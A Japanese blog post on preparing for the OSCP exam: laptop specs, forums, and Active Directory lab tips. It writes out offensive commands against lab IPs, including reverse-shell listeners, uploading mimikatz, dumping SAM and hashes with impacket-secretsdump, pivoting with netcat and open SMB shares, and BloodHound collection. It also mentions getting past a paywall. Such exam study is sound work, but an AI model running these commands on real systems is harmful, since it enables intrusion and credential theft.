3
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

OSCPに必要なPCスペック、AD対策(令和8年版)

3
Last updated at Posted at 2026-09-17

令和8年にOSCPに合格したので、私が受験のときに知っておきたかった情報をまとめました。

PCの必要スペックについて

目安として、中古で買ったThinkPad X1 nano Gen1(約10万円)で十分でした。

ウェブカメラも元々ついている内側カメラで十分です。
私はwindows11にしてmicrosoft office2021入れてます。
image.png

CPU Core i7-1160G7(4コア8スレッド、4.40GHz)
GPU Intel Iris Xe Graphics(1.10GHz)
メモリ LPDDR4x-4267 SDRAM 16GB
ストレ-ジ OSCP試験時512gb (現在2tb)

メモリについて

問題になるのはパスワードクラック

OSCPのパスワードクラックは10分で分かるといいますが、10分で分かるの16ギガバイトでぎりぎりじゃないかな?と思います。

Offsecの提示する最低要件はメモリ4gb、推奨はメモリ8gb以上ですが、

Surface Go (第 1 世代)
CPU:Intel Pentium Gold 4415Y (1.6GHz)
メモリ 8GB RAM
ストレージ 128GB SSD

では通常解析のパスワードクラックでも時間がかかりすぎてラビットホールか分からず損切りできず、かなりきつかったです。

メモリ16gbのマシンを使っていても、たとえばOffsec練習場Providing GroundのSPXというマシンでのhashcatの結果は
Started: Wed Apr 15 13:00:39 2026
Stopped: Wed Apr 15 14:50:18 2026
で、1時間50分かかりました。
このマシンが特殊だったのもありますが、快適に進めるためにはメモリ16gbあった方がいいです。じゃないとラビットホールか正しいパスか見分けられない気がします。

ストレージについて

試験ではなくて、練習の際に問題になります。
OSCP-LK,hacker blue printといったダウンロード系のマシンで練習することを考えたら、できれば512gbはほしい。
ADを練習するために3台のwindowsサーバーを同時に立ち上げることになりますが、たとえばOSCP-LKだとサーバー1台20gb弱のサイズがあり、60gbのサイズが必要になります。

ADだけでこれだけ必要なので、快適にダウンロード系マシンで練習するならある程度の容量がないと都度アンインストールしたり外付けに移したりする必要があります。

OSCPの情報収集

reddit r/oscp

受験生の生の声が集まる

image.png
hack smarter , hacker blue print , OSCP-LKの無料告知が行われる!期間限定が多いのでフォローしておくべき
みんなが何に苦労しているか、新しいツールで何がおすすめか情報が集まります。

AD対策

OSCPはペネトレーションテストなので、どうしても攻撃手法に注目が集まり、あまり触れられることがないのですが、ファイルをkaliから攻撃対象のマシンにアップロードしたりダウンロードしたりということを自由にできることも重要です。
ファイル移動についてまとめました。

第1マシン

image.png

kaliからファイルをダウンロード、アップロードする

初期アクセス用のアカウントがもらえるので、それを使ってファイルのやりとりをすることになります。

139,445番ポート-SMB

あまり想像したくないですがSMB接続のケースから

kaliのterminal
#共有フォルダをリスト
smbclient -L //192.168.10.10/ -U domain//username%password

#接続
smbclient //192.168.10.10/'shares' -U domain//username%password
#タイムアウトエラーを見越してタイムアウト時間を指定
smbclient //192.168.10.10/'shares' -U domain//username%password -t 3600

接続後

smb接続
#ファイルをダウンロード
smb: \share\> get secret.txt
#ファイルをアップロード
smb: \share\> put reverseshell.php

3389番ポート-リモートデスクトップ

kaliで事前に共有用のフォルダ(例:/home/kali/share)を作成しておき、/driveオプションを指定することで共有フォルダ付きリモートデスクトップ接続ができます。

kaliのterminal
xfreerdp /cert-ignore /drive:share,/home/kali/share /u:username /p:password /v:192.168.10.10

リモートデスクトップで開かれたwindowsの"ネットワーク"にkaliの共有フォルダが出現するので、その共有フォルダを介してファイルの行き来が可能になります。

5985番ポート-WinRM

evil-winrm
kaliのterminal
#アップロード
upload /home/kali/share/x64/mimikatz.exe .
#ダウンロード
download sam /home/kali/sam

リバースシェル

ファイルダウンロード・アップロードができるシェルハンドラー(高機能リスナー)もあるので、"nc -lvpn 4444"の代わりに使用すればファイルのアップロード・ダウンロードができます。

penelopeペネロペ

リバースシェルをつかんで離さないリスナー
待ち受けポートが埋まるので注意(リバースシェル捕捉後別ポートにスライドしない)
image.png

使い方(例はlinuxですがwindowsでも使えます)

kaliのterminal
 python3 penelope.py -p 80
 # (別マシン攻略で80番使えなくなるので本当は80番なんかふさがない方がいい)

接続後、fn+f12でメインメニュー
場合によってはfn+cでメインメニュー(リバースシェル捕捉後に表示された説明をよく読む)

kaliのterminal
# ファイルをアップロード
[!] Session detached ⇲

(Penelope)─(Session [1])> upload /home/kali/lin/linpeas.sh
[+] Upload OK /tmp/linpeas.sh

(Penelope)─(Session [1])> upload /home/kali/lin/pspy64
[+] Upload OK /tmp/pspy64

(Penelope)─(Session [1])> 

download コマンドでダウンロードもできます。

元のシェルに復帰
sessionsで確認してsessions 1で復帰

kaliのterminal
(Penelope)─(Session [1])> sessions

➤  neutr.com 192.168.1.1 Linux-x86_64

    ID  | Shell | User      | Source                 
    [1] | PTY   | git(1015) | TCPListener(0.0.0.0:80)

(Penelope)─(Session [1])> sessions 1
[+] Interacting with session [1] • Shell Type PTY • Menu key F12 ⇐
[+] Logging to /home/kali/.penelope/sessions/neutr.com~192.168.1.1-Linux-x86_64/2026_04_14-07_59_56-344.log   
harryyuni@neutr:/tmp$ ls
linpeas.sh
pspy64

第2マシン・DC

第2マシン、DCにポートスキャンする

Windows用公式ツールのPortQry.exeを使う

image.png

チャレンジラボのABCでお分かりかと思いますが、kaliから第2マシン、DCといった内部ネットワークマシンのポートスキャンを実行するのは難しいです。

第1マシンにPortQry.exeをアップロードしてPowershellから実行しましょう。

ただ、遅い。本当はポート未指定で.\PortQry.exe -n 10.10.10.10 -q -r 0:10000のように使いたいけど遅すぎて使い物になりません。

ですから

第1マシンのPowershell
.\PortQry.exe -n 10.10.10.10 -o 21,22,25,80,135,139,443,445,1433,3306,3389,5985,8000,8080

のように頻出ポート決め打ちで使っていました。それでもポートスキャンしないでツール決め打ちするより、根拠がある分おすすめですよ。

第2マシン、DCからのリバースシェルがkaliに届かないとき

ポート転送で解決する方法もあるのでしょうが、私は第1マシンを踏み台にしていました。
第1マシンでリスナー起動して、第2マシン、DCから第1マシンの内部ipアドレス宛にリバースシェルを送ります。
image.png

Windows版nc64.exeを使います。
第1マシンがよっぽど古くない限りnc64.exeを使えばよいと思います。

まずは、第1マシンにnc64.exeを送ります。

コマンドプロンプトではバックスラッシュで実行、もしくは絶対パスで実行することになります。

第1マシンのコマンドプロンプト
.\nc.exe -l -p  443
#もしくはドライブ名から絶対パスで指定して実行
c:\users\username\nc.exe -l -p  443

powershellではスラッシュで実行できます。

第1マシンのパワーシェル
PS C:\Users\Administrator\documents> ./nc64.exe  -l -p  443

nc64.exeを実行するとUACのポップアップが起動することもあるので、管理者権限のリモートデスクトップ接続で実行するとつまづきにくいと思います。

第1マシンをファイルサーバーとして使用

image.png

第2マシンに接続後は、第1マシンをファイルサーバーにしてkaliからも、第2マシン、DCからもアクセスしてしまうという方法があります。

username:passwordというクレデンシャルを入手したと仮定

第1マシンでusernameにアクセス権限のあるフォルダで実行

PS C:\Users> New-SmbShare -Name "yunishare" -Path "C:\users" -FullAccess "Everyone"
Name      ScopeName Path     Description
----      --------- ----     -----------
yunishare *         C:\users

DC,第2マシンから第1マシンに接続(この場合はhドライブを共有フォルダに割り当てる)

PS C:\windows\temp> net use H: \\10.10.10.10\yunishare /user:domain\username password /y
The command completed successfully.

PS C:\windows\temp> cd h:

kaliから第1マシンに接続(smbclient)

kaliのterminal
smbclient \\\\192.168.10.10\\yunishare -U username%password 

ハッシュダンプを確実に抜く

mimikatzだけではハッシュ抜ききれないマシンがあるんです

OSCP-LK
OSCPリストで有名なレインクサナギが自ら作った問題(ときどきredditで無料キャンペーンをしている)
MartiniAD-hacksmarter

impacket-secretsdump 使いましょう

ファイル移動の手間なしでkaliから実行できる!!
権限昇格後は、ぜひmimikatzだけでなくimpacket-secretsdumpも使って資格情報を抜きましょう。

kaliのterminal
# パスワードで実行
impacket-secretsdump administrator:'password'@10.10.10.10
# NTLMハッシュで実行
impacket-secretsdump administrator@10.10.10.10 -hashes :5f4dcc3b5aa765d61d8327deb882cf99

AD情報を確実に集める

  • Sharphound.exeだけでは横移動のためのAD情報が足りない
  • 初期アクセスができていない状態でAD情報がいるとき
    Hacksmarter-Arasaka

Sharphound.exeだけではAD情報が抜ききれないマシンがHacksmarterにあったので、私はSharphound.exeで抜いたzipファイルとbloodhound-pythonで抜いたjsonファイルのすべてをbloodhoundCEに入れて漏れのないようにしていました。

パイソン版bloodhoundでkaliからAD情報を抜く

kaliのterminal
bloodhound-python --dns-tcp -ns 10.10.10.10 -d domain -u 'username' -p 'password' -c all

ADの練習にはHackSmarterがおすすめです。運営のタイラーラムズビーは気前がいいので、新しいマシンは無料提供したり、1か月無料キャンペーンをしたりしています。
redditを追うとよいと思います。

頻出エラーであきらめない

エラーが出てきたら、解消不可能なものかどうか、英語を読みましょう。英語が読めなくても、google翻訳に張り付けて確認しましょう。
OSCPはAI禁止でコードをAIに投げられないので、エラーを解消したときは解消方法をメモで残しておきましょう。
パイソンのエラーもまとめておくと、エクスプロイトが刺さらないときに落ち着いて対応できます。

smbの頻出エラー

たとえば、SMBに接続しようとして

parallel_read returned NT_STATUS_IO_TIMEOUT

のエラーが出た場合は、タイムアウトしてファイルが壊れます。

smbclient //192.168.10.10/shares -U domain//username%password -t 3600

でタイムアウト時間を増やしてアクセスしなおします。

ftpの頻出エラー

たとえば、ftpからデータをダウンロードしようとして

WARNING! 500 bare linefeeds received in ASCII mode.
File may not have transferred correctly.

が出たら、

binary

と実行してバイナリモードにしてからファイルを連れてくる必要があります。
PDFファイルなど、プレーンテキストファイル( .txt )以外を連れてくるときはバイナリモードにしましょう。

OSCPの攻略お勧めのサイト

https://got-root.medium.com/
OSCPの攻略記事が超有用。無料リンクを押せないときは開発者ツール使ったりsource:でアクセスしてクリックすると読めますよ。

レインクサナギOSCP風マシンリスト
チャレンジラボを終えたらこれを元に練習を重ねていくのが定番です。

  • 試験までもう時間がない!というときは公式ウォークスルーあり全6台のOSCP-LK
  • 答えを見ないと全然解けない!というときは公式ウォークスルーのあるHackTheBox
  • LearnOneで、もうお金ないよ!というときはコース付属のOffsecのProviding Groundsをベースにreddit r/oscpで hack smarter,hacker blue print,OSCP-LKの無料告知を待つといいと思います。

私は、AD対策でOSCP-LKと hack smarterをやりこみ、スタンドアロン対策でProviding GroundsとHackTheBoxをやりこみました。

3
1
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
3
1

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?